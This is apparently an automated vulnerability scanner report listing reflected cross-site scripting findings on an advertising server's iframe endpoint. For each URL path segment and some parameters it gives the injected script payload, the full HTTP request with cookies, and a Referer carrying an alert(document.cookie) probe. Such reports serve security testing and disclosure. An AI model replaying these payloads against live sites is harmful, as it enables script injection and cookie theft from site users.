HTTP/1.1 200 OK Server: nginx Date: Sun, 06 Feb 2011 20:43:03 GMT Content-Type: application/x-javascript Connection: close P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 83
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b311e"><script>alert(1)</script>70aa52fbe42 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframeb311e"><script>alert(1)</script>70aa52fbe42/3.0/5113.1/221794/0/-1/size=160x600;noperf=1;alias=93220029;cfp=1;noaddonpl=y;kvpg=bloggingstocks;kvugc=0;kvmn=93220029;target=_blank;aduho=-360;grp=24244844;misc=24244844 HTTP/1.1 Host: at.atwola.com Proxy-Connection: keep-alive Referer: http://www.bloggingstocks.com/?f020e%22-alert(document.cookie)-%22014356e96ab=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ATTACID=a3Z0aWQ9MTZpZjE3YTBrcTBiZ2Q=; CfP=1; JEB2=4D4EEFDF6E651A440C6EAF39F00070C8; AxData=1#60488; Axxd=1; ATTAC=a3ZzZWc9OTk5OTk6NTAwMTI6NTExMzM6NTExODQ6NTI2MTE6NTI2MTU6NTI5NDc6NTM1NzU6NTQ0OTA6NTQ4OTg6NTQ5Mzg6NTQ5NTQ6NTY0MzI6NTY1NTU6NTY3MzI6NTY3MzM6NTY3ODA6NjA0MjU6NjA0ODg6NjA0OTA6NjA0OTE6NjA1MDY6NjA3Mzk6NjE2NzQ6NTAyMTM6NTAyMjA6NTAyMDQ6NTAyMzc6NTAyMjg6NTAyMjk=
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 367
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c0aea"><script>alert(1)</script>048f105caf6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0c0aea"><script>alert(1)</script>048f105caf6/5113.1/221794/0/-1/size=160x600;noperf=1;alias=93220029;cfp=1;noaddonpl=y;kvpg=bloggingstocks;kvugc=0;kvmn=93220029;target=_blank;aduho=-360;grp=24244844;misc=24244844 HTTP/1.1 Host: at.atwola.com Proxy-Connection: keep-alive Referer: http://www.bloggingstocks.com/?f020e%22-alert(document.cookie)-%22014356e96ab=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ATTACID=a3Z0aWQ9MTZpZjE3YTBrcTBiZ2Q=; CfP=1; JEB2=4D4EEFDF6E651A440C6EAF39F00070C8; AxData=1#60488; Axxd=1; ATTAC=a3ZzZWc9OTk5OTk6NTAwMTI6NTExMzM6NTExODQ6NTI2MTE6NTI2MTU6NTI5NDc6NTM1NzU6NTQ0OTA6NTQ4OTg6NTQ5Mzg6NTQ5NTQ6NTY0MzI6NTY1NTU6NTY3MzI6NTY3MzM6NTY3ODA6NjA0MjU6NjA0ODg6NjA0OTA6NjA0OTE6NjA1MDY6NjA3Mzk6NjE2NzQ6NTAyMTM6NTAyMjA6NTAyMDQ6NTAyMzc6NTAyMjg6NTAyMjk=
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 367
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ac20"><script>alert(1)</script>0456f182ac8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5113.16ac20"><script>alert(1)</script>0456f182ac8/221794/0/-1/size=160x600;noperf=1;alias=93220029;cfp=1;noaddonpl=y;kvpg=bloggingstocks;kvugc=0;kvmn=93220029;target=_blank;aduho=-360;grp=24244844;misc=24244844 HTTP/1.1 Host: at.atwola.com Proxy-Connection: keep-alive Referer: http://www.bloggingstocks.com/?f020e%22-alert(document.cookie)-%22014356e96ab=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ATTACID=a3Z0aWQ9MTZpZjE3YTBrcTBiZ2Q=; CfP=1; JEB2=4D4EEFDF6E651A440C6EAF39F00070C8; AxData=1#60488; Axxd=1; ATTAC=a3ZzZWc9OTk5OTk6NTAwMTI6NTExMzM6NTExODQ6NTI2MTE6NTI2MTU6NTI5NDc6NTM1NzU6NTQ0OTA6NTQ4OTg6NTQ5Mzg6NTQ5NTQ6NTY0MzI6NTY1NTU6NTY3MzI6NTY3MzM6NTY3ODA6NjA0MjU6NjA0ODg6NjA0OTA6NjA0OTE6NjA1MDY6NjA3Mzk6NjE2NzQ6NTAyMTM6NTAyMjA6NTAyMDQ6NTAyMzc6NTAyMjg6NTAyMjk=
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 367
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 309fa"><script>alert(1)</script>a95da17c31 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5113.1/221794309fa"><script>alert(1)</script>a95da17c31/0/-1/size=160x600;noperf=1;alias=93220029;cfp=1;noaddonpl=y;kvpg=bloggingstocks;kvugc=0;kvmn=93220029;target=_blank;aduho=-360;grp=24244844;misc=24244844 HTTP/1.1 Host: at.atwola.com Proxy-Connection: keep-alive Referer: http://www.bloggingstocks.com/?f020e%22-alert(document.cookie)-%22014356e96ab=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ATTACID=a3Z0aWQ9MTZpZjE3YTBrcTBiZ2Q=; CfP=1; JEB2=4D4EEFDF6E651A440C6EAF39F00070C8; AxData=1#60488; Axxd=1; ATTAC=a3ZzZWc9OTk5OTk6NTAwMTI6NTExMzM6NTExODQ6NTI2MTE6NTI2MTU6NTI5NDc6NTM1NzU6NTQ0OTA6NTQ4OTg6NTQ5Mzg6NTQ5NTQ6NTY0MzI6NTY1NTU6NTY3MzI6NTY3MzM6NTY3ODA6NjA0MjU6NjA0ODg6NjA0OTA6NjA0OTE6NjA1MDY6NjA3Mzk6NjE2NzQ6NTAyMTM6NTAyMjA6NTAyMDQ6NTAyMzc6NTAyMjg6NTAyMjk=
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 366
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7aa9b"><script>alert(1)</script>f586567e29c was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5113.1/221794/07aa9b"><script>alert(1)</script>f586567e29c/-1/size=160x600;noperf=1;alias=93220029;cfp=1;noaddonpl=y;kvpg=bloggingstocks;kvugc=0;kvmn=93220029;target=_blank;aduho=-360;grp=24244844;misc=24244844 HTTP/1.1 Host: at.atwola.com Proxy-Connection: keep-alive Referer: http://www.bloggingstocks.com/?f020e%22-alert(document.cookie)-%22014356e96ab=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ATTACID=a3Z0aWQ9MTZpZjE3YTBrcTBiZ2Q=; CfP=1; JEB2=4D4EEFDF6E651A440C6EAF39F00070C8; AxData=1#60488; Axxd=1; ATTAC=a3ZzZWc9OTk5OTk6NTAwMTI6NTExMzM6NTExODQ6NTI2MTE6NTI2MTU6NTI5NDc6NTM1NzU6NTQ0OTA6NTQ4OTg6NTQ5Mzg6NTQ5NTQ6NTY0MzI6NTY1NTU6NTY3MzI6NTY3MzM6NTY3ODA6NjA0MjU6NjA0ODg6NjA0OTA6NjA0OTE6NjA1MDY6NjA3Mzk6NjE2NzQ6NTAyMTM6NTAyMjA6NTAyMDQ6NTAyMzc6NTAyMjg6NTAyMjk=
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 367
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c27e3"><script>alert(1)</script>773b6376821 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5113.1/221794/0/-1c27e3"><script>alert(1)</script>773b6376821/size=160x600;noperf=1;alias=93220029;cfp=1;noaddonpl=y;kvpg=bloggingstocks;kvugc=0;kvmn=93220029;target=_blank;aduho=-360;grp=24244844;misc=24244844 HTTP/1.1 Host: at.atwola.com Proxy-Connection: keep-alive Referer: http://www.bloggingstocks.com/?f020e%22-alert(document.cookie)-%22014356e96ab=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ATTACID=a3Z0aWQ9MTZpZjE3YTBrcTBiZ2Q=; CfP=1; JEB2=4D4EEFDF6E651A440C6EAF39F00070C8; AxData=1#60488; Axxd=1; ATTAC=a3ZzZWc9OTk5OTk6NTAwMTI6NTExMzM6NTExODQ6NTI2MTE6NTI2MTU6NTI5NDc6NTM1NzU6NTQ0OTA6NTQ4OTg6NTQ5Mzg6NTQ5NTQ6NTY0MzI6NTY1NTU6NTY3MzI6NTY3MzM6NTY3ODA6NjA0MjU6NjA0ODg6NjA0OTA6NjA0OTE6NjA1MDY6NjA3Mzk6NjE2NzQ6NTAyMTM6NTAyMjA6NTAyMDQ6NTAyMzc6NTAyMjg6NTAyMjk=
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 367
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce70a"><script>alert(1)</script>735d74c1b51 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5113.1/221794/0/-1/sizece70a"><script>alert(1)</script>735d74c1b51=160x600;noperf=1;alias=93220029;cfp=1;noaddonpl=y;kvpg=bloggingstocks;kvugc=0;kvmn=93220029;target=_blank;aduho=-360;grp=24244844;misc=24244844 HTTP/1.1 Host: at.atwola.com Proxy-Connection: keep-alive Referer: http://www.bloggingstocks.com/?f020e%22-alert(document.cookie)-%22014356e96ab=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ATTACID=a3Z0aWQ9MTZpZjE3YTBrcTBiZ2Q=; CfP=1; JEB2=4D4EEFDF6E651A440C6EAF39F00070C8; AxData=1#60488; Axxd=1; ATTAC=a3ZzZWc9OTk5OTk6NTAwMTI6NTExMzM6NTExODQ6NTI2MTE6NTI2MTU6NTI5NDc6NTM1NzU6NTQ0OTA6NTQ4OTg6NTQ5Mzg6NTQ5NTQ6NTY0MzI6NTY1NTU6NTY3MzI6NTY3MzM6NTY3ODA6NjA0MjU6NjA0ODg6NjA0OTA6NjA0OTE6NjA1MDY6NjA3Mzk6NjE2NzQ6NTAyMTM6NTAyMjA6NTAyMDQ6NTAyMzc6NTAyMjg6NTAyMjk=
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 367
1.50. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=160x600 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://at.atwola.com
Path:
/adiframe/3.0/5113.1/221794/0/-1/size=160x600
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d167e"><script>alert(1)</script>5532f5945a4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5113.1/221794/0/-1/size=160x600;noperf=1;alias=93220029;cfp=1;noaddonpl=y;kvpg=bloggingstocks;kvugc=0;kvmn=93220029;target=_blank;aduho=-360;grp=24244844;misc=24244844&d167e"><script>alert(1)</script>5532f5945a4=1 HTTP/1.1 Host: at.atwola.com Proxy-Connection: keep-alive Referer: http://www.bloggingstocks.com/?f020e%22-alert(document.cookie)-%22014356e96ab=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ATTACID=a3Z0aWQ9MTZpZjE3YTBrcTBiZ2Q=; CfP=1; JEB2=4D4EEFDF6E651A440C6EAF39F00070C8; AxData=1#60488; Axxd=1; ATTAC=a3ZzZWc9OTk5OTk6NTAwMTI6NTExMzM6NTExODQ6NTI2MTE6NTI2MTU6NTI5NDc6NTM1NzU6NTQ0OTA6NTQ4OTg6NTQ5Mzg6NTQ5NTQ6NTY0MzI6NTY1NTU6NTY3MzI6NTY3MzM6NTY3ODA6NjA0MjU6NjA0ODg6NjA0OTA6NjA0OTE6NjA1MDY6NjA3Mzk6NjE2NzQ6NTAyMTM6NTAyMjA6NTAyMDQ6NTAyMzc6NTAyMjg6NTAyMjk=
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 370
The value of the noperf request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6861"><script>alert(1)</script>ad0c3bcb1e7 was submitted in the noperf parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5113.1/221794/0/-1/size=160x600;noperf=1;alias=93220029;cfp=1;noaddonpl=y;kvpg=bloggingstocks;kvugc=0;kvmn=93220029;target=_blank;aduho=-360;grp=24244844;misc=24244844c6861"><script>alert(1)</script>ad0c3bcb1e7 HTTP/1.1 Host: at.atwola.com Proxy-Connection: keep-alive Referer: http://www.bloggingstocks.com/?f020e%22-alert(document.cookie)-%22014356e96ab=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ATTACID=a3Z0aWQ9MTZpZjE3YTBrcTBiZ2Q=; CfP=1; JEB2=4D4EEFDF6E651A440C6EAF39F00070C8; AxData=1#60488; Axxd=1; ATTAC=a3ZzZWc9OTk5OTk6NTAwMTI6NTExMzM6NTExODQ6NTI2MTE6NTI2MTU6NTI5NDc6NTM1NzU6NTQ0OTA6NTQ4OTg6NTQ5Mzg6NTQ5NTQ6NTY0MzI6NTY1NTU6NTY3MzI6NTY3MzM6NTY3ODA6NjA0MjU6NjA0ODg6NjA0OTA6NjA0OTE6NjA1MDY6NjA3Mzk6NjE2NzQ6NTAyMTM6NTAyMjA6NTAyMDQ6NTAyMzc6NTAyMjg6NTAyMjk=
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 367
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48ed2"><script>alert(1)</script>a7413131d8b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe48ed2"><script>alert(1)</script>a7413131d8b/3.0/5113.1/221794/0/-1/size=300x250 HTTP/1.1 Host: at.atwola.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JEB2=4D4EEFDF6E651A440C6EAF39F00070C8; ATTAC=a3ZzZWc9OTk5OTk6NTAwMTI6NTExMzM6NTExODQ6NTI2MTE6NTI2MTU6NTI5NDc6NTM1NzU6NTQ0OTA6NTQ4OTg6NTQ5Mzg6NTQ5NTQ6NTY0MzI6NTY1NTU6NTY3MzI6NTY3MzM6NTY3ODA6NjA0MjU6NjA0ODg6NjA0OTA6NjA0OTE6NjA1MDY6NjA3Mzk6NjE2NzQ6NTAyMTM6NTAyMjA6NTAyMDQ=; CfP=1; ATTACID=a3Z0aWQ9MTZpZjE3YTBrcTBiZ2Q=;
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 229
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a33b"><script>alert(1)</script>d2b240b8cbd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.08a33b"><script>alert(1)</script>d2b240b8cbd/5113.1/221794/0/-1/size=300x250 HTTP/1.1 Host: at.atwola.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JEB2=4D4EEFDF6E651A440C6EAF39F00070C8; ATTAC=a3ZzZWc9OTk5OTk6NTAwMTI6NTExMzM6NTExODQ6NTI2MTE6NTI2MTU6NTI5NDc6NTM1NzU6NTQ0OTA6NTQ4OTg6NTQ5Mzg6NTQ5NTQ6NTY0MzI6NTY1NTU6NTY3MzI6NTY3MzM6NTY3ODA6NjA0MjU6NjA0ODg6NjA0OTA6NjA0OTE6NjA1MDY6NjA3Mzk6NjE2NzQ6NTAyMTM6NTAyMjA6NTAyMDQ=; CfP=1; ATTACID=a3Z0aWQ9MTZpZjE3YTBrcTBiZ2Q=;
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 229
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf8ec"><script>alert(1)</script>b39abb6cf7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5113.1cf8ec"><script>alert(1)</script>b39abb6cf7/221794/0/-1/size=300x250 HTTP/1.1 Host: at.atwola.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JEB2=4D4EEFDF6E651A440C6EAF39F00070C8; ATTAC=a3ZzZWc9OTk5OTk6NTAwMTI6NTExMzM6NTExODQ6NTI2MTE6NTI2MTU6NTI5NDc6NTM1NzU6NTQ0OTA6NTQ4OTg6NTQ5Mzg6NTQ5NTQ6NTY0MzI6NTY1NTU6NTY3MzI6NTY3MzM6NTY3ODA6NjA0MjU6NjA0ODg6NjA0OTA6NjA0OTE6NjA1MDY6NjA3Mzk6NjE2NzQ6NTAyMTM6NTAyMjA6NTAyMDQ=; CfP=1; ATTACID=a3Z0aWQ9MTZpZjE3YTBrcTBiZ2Q=;
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 228
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 984e3"><script>alert(1)</script>381ff05b531 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5113.1/221794984e3"><script>alert(1)</script>381ff05b531/0/-1/size=300x250 HTTP/1.1 Host: at.atwola.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JEB2=4D4EEFDF6E651A440C6EAF39F00070C8; ATTAC=a3ZzZWc9OTk5OTk6NTAwMTI6NTExMzM6NTExODQ6NTI2MTE6NTI2MTU6NTI5NDc6NTM1NzU6NTQ0OTA6NTQ4OTg6NTQ5Mzg6NTQ5NTQ6NTY0MzI6NTY1NTU6NTY3MzI6NTY3MzM6NTY3ODA6NjA0MjU6NjA0ODg6NjA0OTA6NjA0OTE6NjA1MDY6NjA3Mzk6NjE2NzQ6NTAyMTM6NTAyMjA6NTAyMDQ=; CfP=1; ATTACID=a3Z0aWQ9MTZpZjE3YTBrcTBiZ2Q=;
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 229
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7efe"><script>alert(1)</script>184e0a940d6 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5113.1/221794/0e7efe"><script>alert(1)</script>184e0a940d6/-1/size=300x250 HTTP/1.1 Host: at.atwola.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JEB2=4D4EEFDF6E651A440C6EAF39F00070C8; ATTAC=a3ZzZWc9OTk5OTk6NTAwMTI6NTExMzM6NTExODQ6NTI2MTE6NTI2MTU6NTI5NDc6NTM1NzU6NTQ0OTA6NTQ4OTg6NTQ5Mzg6NTQ5NTQ6NTY0MzI6NTY1NTU6NTY3MzI6NTY3MzM6NTY3ODA6NjA0MjU6NjA0ODg6NjA0OTA6NjA0OTE6NjA1MDY6NjA3Mzk6NjE2NzQ6NTAyMTM6NTAyMjA6NTAyMDQ=; CfP=1; ATTACID=a3Z0aWQ9MTZpZjE3YTBrcTBiZ2Q=;
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 229
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c147"><script>alert(1)</script>c56f6924a19 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5113.1/221794/0/-17c147"><script>alert(1)</script>c56f6924a19/size=300x250 HTTP/1.1 Host: at.atwola.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JEB2=4D4EEFDF6E651A440C6EAF39F00070C8; ATTAC=a3ZzZWc9OTk5OTk6NTAwMTI6NTExMzM6NTExODQ6NTI2MTE6NTI2MTU6NTI5NDc6NTM1NzU6NTQ0OTA6NTQ4OTg6NTQ5Mzg6NTQ5NTQ6NTY0MzI6NTY1NTU6NTY3MzI6NTY3MzM6NTY3ODA6NjA0MjU6NjA0ODg6NjA0OTA6NjA0OTE6NjA1MDY6NjA3Mzk6NjE2NzQ6NTAyMTM6NTAyMjA6NTAyMDQ=; CfP=1; ATTACID=a3Z0aWQ9MTZpZjE3YTBrcTBiZ2Q=;
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 229
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 30bcd"><script>alert(1)</script>adc7d40215f was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5113.1/221794/0/-1/size30bcd"><script>alert(1)</script>adc7d40215f=300x250 HTTP/1.1 Host: at.atwola.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JEB2=4D4EEFDF6E651A440C6EAF39F00070C8; ATTAC=a3ZzZWc9OTk5OTk6NTAwMTI6NTExMzM6NTExODQ6NTI2MTE6NTI2MTU6NTI5NDc6NTM1NzU6NTQ0OTA6NTQ4OTg6NTQ5Mzg6NTQ5NTQ6NTY0MzI6NTY1NTU6NTY3MzI6NTY3MzM6NTY3ODA6NjA0MjU6NjA0ODg6NjA0OTA6NjA0OTE6NjA1MDY6NjA3Mzk6NjE2NzQ6NTAyMTM6NTAyMjA6NTAyMDQ=; CfP=1; ATTACID=a3Z0aWQ9MTZpZjE3YTBrcTBiZ2Q=;
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 229
1.59. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://at.atwola.com
Path:
/adiframe/3.0/5113.1/221794/0/-1/size=300x250
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9149d"><script>alert(1)</script>622ffc05fe8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5113.1/221794/0/-1/size=300x250?9149d"><script>alert(1)</script>622ffc05fe8=1 HTTP/1.1 Host: at.atwola.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JEB2=4D4EEFDF6E651A440C6EAF39F00070C8; ATTAC=a3ZzZWc9OTk5OTk6NTAwMTI6NTExMzM6NTExODQ6NTI2MTE6NTI2MTU6NTI5NDc6NTM1NzU6NTQ0OTA6NTQ4OTg6NTQ5Mzg6NTQ5NTQ6NTY0MzI6NTY1NTU6NTY3MzI6NTY3MzM6NTY3ODA6NjA0MjU6NjA0ODg6NjA0OTA6NjA0OTE6NjA1MDY6NjA3Mzk6NjE2NzQ6NTAyMTM6NTAyMjA6NTAyMDQ=; CfP=1; ATTACID=a3Z0aWQ9MTZpZjE3YTBrcTBiZ2Q=;
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 232
The value of the noperf request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c98c6"><script>alert(1)</script>3c3af206613 was submitted in the noperf parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5113.1/221794/0/-1/size=300x250;noperf=1;alias=93305907;cfp=1;noaddonpl=y;kvpg=bloggingstocks;kvugc=0;kvmn=93305907;target=_blank;aduho=-360;grp=24244844;misc=24244844c98c6"><script>alert(1)</script>3c3af206613 HTTP/1.1 Host: at.atwola.com Proxy-Connection: keep-alive Referer: http://www.bloggingstocks.com/?f020e%22-alert(document.cookie)-%22014356e96ab=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ATTACID=a3Z0aWQ9MTZpZjE3YTBrcTBiZ2Q=; CfP=1; 